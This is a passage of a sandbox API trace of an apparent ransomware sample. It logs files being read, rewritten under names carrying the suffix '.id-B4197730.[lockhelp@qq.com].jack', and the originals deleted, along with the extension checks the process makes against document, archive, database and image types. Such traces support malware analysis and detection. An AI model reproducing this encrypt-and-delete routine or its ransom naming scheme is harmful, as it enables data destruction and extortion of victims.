0xffffffff [0196.883] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1032\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3fc [0196.883] SetFilePointerEx (in: hFile=0x3fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.883] SetFilePointerEx (in: hFile=0x3fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.883] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1032\\localizeddata.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0196.883] GetLastError () returned 0x0 [0196.883] ReadFile (in: hFile=0x3fc, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x1510c, lpOverlapped=0x0) returned 1 [0196.948] WriteFile (in: hFile=0x404, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0x15110, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0x15110, lpOverlapped=0x0) returned 1 [0196.951] ReadFile (in: hFile=0x3fc, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.951] WriteFile (in: hFile=0x404, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0xf6, lpOverlapped=0x0) returned 1 [0196.951] SetEndOfFile (hFile=0x404) returned 1 [0196.951] CloseHandle (hObject=0x404) returned 1 [0196.960] SetFilePointerEx (in: hFile=0x3fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.960] SetEndOfFile (hFile=0x3fc) returned 1 [0196.961] CloseHandle (hObject=0x3fc) returned 1 [0196.961] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0196.962] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1032\\localizeddata.xml")) returned 1 [0196.962] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned 44 [0196.962] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned 44 [0196.962] lstrlenW (lpString=".doc") returned 4 [0196.962] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0196.962] lstrlenW (lpString=".docx") returned 5 [0196.962] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0196.962] lstrlenW (lpString=".pdf") returned 4 [0196.962] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0196.962] lstrlenW (lpString=".xls") returned 4 [0196.962] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0196.962] lstrlenW (lpString=".xlsx") returned 5 [0196.962] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0196.962] lstrlenW (lpString=".ppt") returned 4 [0196.962] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0196.962] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned 44 [0196.962] lstrlenW (lpString=".zip") returned 4 [0196.963] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0196.963] lstrlenW (lpString=".rar") returned 4 [0196.963] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0196.963] lstrlenW (lpString=".bz2") returned 4 [0196.963] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0196.963] lstrlenW (lpString=".7z") returned 3 [0196.963] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0196.963] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned 44 [0196.963] lstrlenW (lpString=".dbf") returned 4 [0196.963] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0196.963] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned 44 [0196.963] lstrlenW (lpString=".1cd") returned 4 [0196.963] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0196.963] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned 44 [0196.963] lstrlenW (lpString=".jpg") returned 4 [0196.963] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0196.963] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned 44 [0196.963] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned 44 [0196.963] lstrlenW (lpString=".doc") returned 4 [0196.963] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0196.963] lstrlenW (lpString=".docx") returned 5 [0196.963] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0196.963] lstrlenW (lpString=".pdf") returned 4 [0196.963] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0196.963] lstrlenW (lpString=".xls") returned 4 [0196.963] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0196.963] lstrlenW (lpString=".xlsx") returned 5 [0196.964] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0196.964] lstrlenW (lpString=".ppt") returned 4 [0196.964] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0196.964] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned 44 [0196.964] lstrlenW (lpString=".zip") returned 4 [0196.964] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0196.964] lstrlenW (lpString=".rar") returned 4 [0196.964] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0196.964] lstrlenW (lpString=".bz2") returned 4 [0196.964] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0196.964] lstrlenW (lpString=".7z") returned 3 [0196.964] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0196.964] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned 44 [0196.964] lstrlenW (lpString=".dbf") returned 4 [0196.964] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0196.964] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned 44 [0196.964] lstrlenW (lpString=".1cd") returned 4 [0196.964] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0196.964] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned 44 [0196.964] lstrlenW (lpString=".jpg") returned 4 [0196.964] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0196.964] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0196.965] lstrlenW (lpString="LocalizedData.xml") returned 17 [0196.965] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1033\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3fc [0196.965] GetFileSizeEx (in: hFile=0x3fc, lpFileSize=0x391ff14 | out: lpFileSize=0x391ff14*=77232) returned 1 [0196.965] CloseHandle (hObject=0x3fc) returned 1 [0196.965] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1033\\localizeddata.xml")) returned 0x80 [0196.967] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1033\\localizeddata.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0196.967] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1033\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3fc [0196.967] SetFilePointerEx (in: hFile=0x3fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.967] SetFilePointerEx (in: hFile=0x3fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.967] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1033\\localizeddata.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0196.968] GetLastError () returned 0x0 [0196.968] ReadFile (in: hFile=0x3fc, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x12db0, lpOverlapped=0x0) returned 1 [0197.014] WriteFile (in: hFile=0x404, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0x12dc0, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0x12dc0, lpOverlapped=0x0) returned 1 [0197.016] ReadFile (in: hFile=0x3fc, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.016] WriteFile (in: hFile=0x404, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0xf6, lpOverlapped=0x0) returned 1 [0197.017] SetEndOfFile (hFile=0x404) returned 1 [0197.017] CloseHandle (hObject=0x404) returned 1 [0197.022] SetFilePointerEx (in: hFile=0x3fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.022] SetEndOfFile (hFile=0x3fc) returned 1 [0197.023] CloseHandle (hObject=0x3fc) returned 1 [0197.023] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.024] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1033\\localizeddata.xml")) returned 1 [0197.024] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned 44 [0197.024] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned 44 [0197.024] lstrlenW (lpString=".doc") returned 4 [0197.024] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0197.024] lstrlenW (lpString=".docx") returned 5 [0197.024] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0197.024] lstrlenW (lpString=".pdf") returned 4 [0197.024] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0197.024] lstrlenW (lpString=".xls") returned 4 [0197.024] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0197.024] lstrlenW (lpString=".xlsx") returned 5 [0197.024] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0197.024] lstrlenW (lpString=".ppt") returned 4 [0197.024] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0197.025] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned 44 [0197.025] lstrlenW (lpString=".zip") returned 4 [0197.025] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0197.025] lstrlenW (lpString=".rar") returned 4 [0197.025] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0197.025] lstrlenW (lpString=".bz2") returned 4 [0197.025] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0197.025] lstrlenW (lpString=".7z") returned 3 [0197.025] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0197.025] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned 44 [0197.025] lstrlenW (lpString=".dbf") returned 4 [0197.025] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0197.025] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned 44 [0197.025] lstrlenW (lpString=".1cd") returned 4 [0197.025] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0197.025] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned 44 [0197.025] lstrlenW (lpString=".jpg") returned 4 [0197.025] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0197.025] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned 44 [0197.025] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned 44 [0197.025] lstrlenW (lpString=".doc") returned 4 [0197.025] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0197.025] lstrlenW (lpString=".docx") returned 5 [0197.025] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0197.025] lstrlenW (lpString=".pdf") returned 4 [0197.025] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0197.025] lstrlenW (lpString=".xls") returned 4 [0197.026] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0197.026] lstrlenW (lpString=".xlsx") returned 5 [0197.026] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0197.026] lstrlenW (lpString=".ppt") returned 4 [0197.026] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0197.026] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned 44 [0197.026] lstrlenW (lpString=".zip") returned 4 [0197.026] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0197.026] lstrlenW (lpString=".rar") returned 4 [0197.026] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0197.026] lstrlenW (lpString=".bz2") returned 4 [0197.026] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0197.026] lstrlenW (lpString=".7z") returned 3 [0197.026] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0197.026] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned 44 [0197.026] lstrlenW (lpString=".dbf") returned 4 [0197.026] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0197.026] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned 44 [0197.026] lstrlenW (lpString=".1cd") returned 4 [0197.026] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0197.026] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned 44 [0197.026] lstrlenW (lpString=".jpg") returned 4 [0197.026] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0197.026] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0197.027] lstrlenW (lpString="LocalizedData.xml") returned 17 [0197.027] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1035\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3fc [0197.027] GetFileSizeEx (in: hFile=0x3fc, lpFileSize=0x391ff14 | out: lpFileSize=0x391ff14*=77022) returned 1 [0197.027] CloseHandle (hObject=0x3fc) returned 1 [0197.027] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1035\\localizeddata.xml")) returned 0x80 [0197.027] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1035\\localizeddata.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.027] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1035\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3fc [0197.027] SetFilePointerEx (in: hFile=0x3fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.027] SetFilePointerEx (in: hFile=0x3fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.028] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1035\\localizeddata.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0197.028] GetLastError () returned 0x0 [0197.028] ReadFile (in: hFile=0x3fc, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x12cde, lpOverlapped=0x0) returned 1 [0197.165] WriteFile (in: hFile=0x404, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0x12ce0, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0x12ce0, lpOverlapped=0x0) returned 1 [0197.167] ReadFile (in: hFile=0x3fc, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.168] WriteFile (in: hFile=0x404, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0xf6, lpOverlapped=0x0) returned 1 [0197.168] SetEndOfFile (hFile=0x404) returned 1 [0197.168] CloseHandle (hObject=0x404) returned 1 [0197.170] SetFilePointerEx (in: hFile=0x3fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.170] SetEndOfFile (hFile=0x3fc) returned 1 [0197.172] CloseHandle (hObject=0x3fc) returned 1 [0197.172] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.172] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1035\\localizeddata.xml")) returned 1 [0197.172] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned 44 [0197.173] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned 44 [0197.173] lstrlenW (lpString=".doc") returned 4 [0197.173] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0197.173] lstrlenW (lpString=".docx") returned 5 [0197.173] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0197.173] lstrlenW (lpString=".pdf") returned 4 [0197.173] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0197.173] lstrlenW (lpString=".xls") returned 4 [0197.173] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0197.173] lstrlenW (lpString=".xlsx") returned 5 [0197.173] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0197.173] lstrlenW (lpString=".ppt") returned 4 [0197.173] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0197.173] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned 44 [0197.173] lstrlenW (lpString=".zip") returned 4 [0197.173] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0197.173] lstrlenW (lpString=".rar") returned 4 [0197.173] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0197.173] lstrlenW (lpString=".bz2") returned 4 [0197.173] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0197.173] lstrlenW (lpString=".7z") returned 3 [0197.173] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0197.173] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned 44 [0197.173] lstrlenW (lpString=".dbf") returned 4 [0197.173] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0197.173] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned 44 [0197.173] lstrlenW (lpString=".1cd") returned 4 [0197.173] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0197.174] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned 44 [0197.174] lstrlenW (lpString=".jpg") returned 4 [0197.174] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0197.174] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned 44 [0197.174] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned 44 [0197.174] lstrlenW (lpString=".doc") returned 4 [0197.174] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0197.174] lstrlenW (lpString=".docx") returned 5 [0197.174] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0197.174] lstrlenW (lpString=".pdf") returned 4 [0197.174] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0197.174] lstrlenW (lpString=".xls") returned 4 [0197.174] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0197.174] lstrlenW (lpString=".xlsx") returned 5 [0197.174] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0197.174] lstrlenW (lpString=".ppt") returned 4 [0197.174] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0197.174] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned 44 [0197.174] lstrlenW (lpString=".zip") returned 4 [0197.174] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0197.174] lstrlenW (lpString=".rar") returned 4 [0197.174] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0197.174] lstrlenW (lpString=".bz2") returned 4 [0197.174] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0197.174] lstrlenW (lpString=".7z") returned 3 [0197.174] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0197.174] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned 44 [0197.174] lstrlenW (lpString=".dbf") returned 4 [0197.175] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0197.175] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned 44 [0197.175] lstrlenW (lpString=".1cd") returned 4 [0197.175] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0197.175] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned 44 [0197.175] lstrlenW (lpString=".jpg") returned 4 [0197.175] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0197.175] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0197.175] lstrlenW (lpString="LocalizedData.xml") returned 17 [0197.175] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1037\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3fc [0197.176] GetFileSizeEx (in: hFile=0x3fc, lpFileSize=0x391ff14 | out: lpFileSize=0x391ff14*=72076) returned 1 [0197.176] CloseHandle (hObject=0x3fc) returned 1 [0197.176] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1037\\localizeddata.xml")) returned 0x80 [0197.176] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1037\\localizeddata.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.176] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1037\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3fc [0197.176] SetFilePointerEx (in: hFile=0x3fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.176] SetFilePointerEx (in: hFile=0x3fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.177] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1037\\localizeddata.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0197.177] GetLastError () returned 0x0 [0197.177] ReadFile (in: hFile=0x3fc, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x1198c, lpOverlapped=0x0) returned 1 [0197.278] WriteFile (in: hFile=0x404, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0x11990, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0x11990, lpOverlapped=0x0) returned 1 [0197.281] ReadFile (in: hFile=0x3fc, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.281] WriteFile (in: hFile=0x404, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0xf6, lpOverlapped=0x0) returned 1 [0197.281] SetEndOfFile (hFile=0x404) returned 1 [0197.281] CloseHandle (hObject=0x404) returned 1 [0197.283] SetFilePointerEx (in: hFile=0x3fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.283] SetEndOfFile (hFile=0x3fc) returned 1 [0197.285] CloseHandle (hObject=0x3fc) returned 1 [0197.285] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.285] DeleteFileW 